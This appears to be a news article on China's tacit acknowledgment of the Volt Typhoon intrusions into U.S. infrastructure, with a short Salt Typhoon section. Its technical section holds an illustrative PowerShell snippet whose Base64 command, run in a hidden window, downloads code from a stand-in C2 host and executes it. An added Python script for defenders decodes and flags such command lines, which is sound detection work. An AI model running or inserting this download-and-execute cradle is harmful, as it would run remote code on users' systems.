
Chinese officials have implicitly acknowledged responsibility for a series of sophisticated cyber intrusions targeting critical U.S. infrastructure.
During a high-level meeting in Geneva with American officials, representatives from China’s Ministry of Foreign Affairs indirectly linked years of computer network breaches at U.S. ports, water utilities, airports, and other critical targets to increasing U.S. policy support for Taiwan.
The campaign, dubbed “Volt Typhoon” by security researchers, has been described by U.S. officials as an attempt to establish a foothold in critical networks that could be leveraged during a potential future conflict.
The admission came during a previously undisclosed half-day summit in December, attended by approximately a dozen representatives from both countries, including senior officials from the State Department, National Security Council, Pentagon, and U.S. intelligence agencies.
The meeting was led by Nate Fick, then the ambassador-at-large for cyberspace and digital policy in the Biden administration.
While Chinese officials did not explicitly claim responsibility, their comments were interpreted by the American delegation as confirmation of Beijing’s involvement and a warning about U.S. involvement in Taiwan.
MSN analysts identified the Volt Typhoon campaign as particularly concerning due to its focus on civilian infrastructure rather than traditional intelligence targets.
Security researchers noted that the operation’s sophisticated nature and persistence techniques suggest a well-resourced, state-sponsored actor with long-term strategic objectives rather than immediate financial gain.
Wang Lei, a top cyber official with China’s Ministry of Foreign Affairs, made the comments after U.S. representatives emphasized that China appeared not to understand how dangerous prepositioning in civilian critical infrastructure was, and how such actions could be viewed as an act of war.
American officials present at the meeting perceived the remarks as confirmation of Beijing’s role and an attempt to deter U.S. involvement should conflict erupt in the Taiwan Strait.
The admission is considered extraordinary, as Chinese officials have typically denied involvement in cyber operations, blamed criminal entities, or accused the U.S. of fabricating allegations.
Dakota Cary, a China expert at cybersecurity firm SentinelOne, noted that such an acknowledgment, even indirectly, likely required instructions from the highest levels of President Xi Jinping’s government.
Technical Analysis of Volt Typhoon Campaign
Technical assessment of the Volt Typhoon operations reveals sophisticated living-off-the-land techniques where attackers leverage legitimate system tools and processes to avoid detection.
The campaign primarily exploits known vulnerabilities in network infrastructure devices, establishing persistence through modified system libraries. Once inside target networks, the actors maintain access through encrypted command-and-control channels that blend with legitimate traffic.
# Example of a typical living-off-the-land technique
# This illustrates how attackers might use PowerShell for stealthy execution
# -EncodedCommand expects the Base64 text itself (a UTF-16LE command); $decoded is the plain-text command it carries
$encoded = 'JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjADIALgBlAHgAYQBtAHAAbABlAC4AYwBvAG0ALwBjAG8AbQBtAGEAbgBkAC4AdAB4AHQAJwApAHwASQBFAFgA'
$decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded))
powershell -WindowStyle Hidden -EncodedCommand $encoded
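For defenders, the useful counterpart to the snippet above is triage of process-creation logs: find PowerShell launches that carry an encoded command, decode it, and flag what it does. The following is an added example, not code from the article or from any vendor; the function names and sample command lines are constructed, and the Base64 string is the one from the snippet above.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...); -ec is an alias.
FLAG = re.compile(r"(?i)(?:^|\s)[-/](e[a-z]*)\s+['\"]?([A-Za-z0-9+/=]+)")
HIDDEN = re.compile(r"(?i)[-/]w[a-z]*\s+hidden\b")
INDICATORS = {
    "download cradle": re.compile(r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest"),
    "dynamic execution": re.compile(r"(?i)\biex\b|invoke-expression"),
}

def decode_encoded_command(cmdline):
    """Return the script carried by -EncodedCommand, or None if absent or undecodable."""
    for m in FLAG.finditer(cmdline):
        flag = m.group(1).lower()
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue  # some other -E* switch, e.g. -ExecutionPolicy
        try:
            return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except ValueError:  # malformed Base64 or truncated UTF-16
            return None
    return None

def triage(cmdline):
    """Return (decoded_script, sorted reasons this command line deserves review)."""
    script = decode_encoded_command(cmdline)
    reasons = ["hidden window"] if HIDDEN.search(cmdline) else []
    if script is not None:
        reasons.append("encoded command")
        reasons += [name for name, rx in INDICATORS.items() if rx.search(script)]
    return script, sorted(reasons)

# Base64 string copied from the article's snippet, split only for line length.
PAGE_BLOB = (
    "JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQA"
    "LgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQA"
    "cgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjADIALgBlAHgAYQBtAHAAbABlAC4A"
    "YwBvAG0ALwBjAG8AbQBtAGEAbgBkAC4AdAB4AHQAJwApAHwASQBFAFgA"
)
BENIGN_BLOB = base64.b64encode("Get-Date".encode("utf-16-le")).decode()
# Constructed process-creation command lines, as a process-creation log would record them.
SAMPLES = [
    f"powershell.exe -WindowStyle Hidden -EncodedCommand {PAGE_BLOB}",
    f"powershell.exe -NoProfile -ExecutionPolicy Bypass -enc {BENIGN_BLOB}",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        script, reasons = triage(line)
        print(reasons or ["no findings"], "->", script)
```

An encoded command alone is not proof of compromise, since administrators and management tools use it too; the decoded content and the parent process are what separate the second sample from the first.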
The Geneva meeting also addressed a separate hacking campaign known as “Salt Typhoon,” which targeted U.S. telecommunications networks including AT&T and Verizon.
This operation reportedly allowed hackers working for China’s Ministry of State Security to access unencrypted calls and texts of numerous government officials and political figures, including those within the presidential campaigns of Donald Trump and Kamala Harris.
This tacit admission comes amid deteriorating relations between Washington and Beijing, which are locked in an escalating trade war.
The Trump administration has indicated plans to pursue more offensive cyber strikes against China, while simultaneously dismissing hundreds of cybersecurity workers and recently firing the director of the National Security Agency and his deputy, raising concerns about the government’s capacity to defend against ongoing attacks.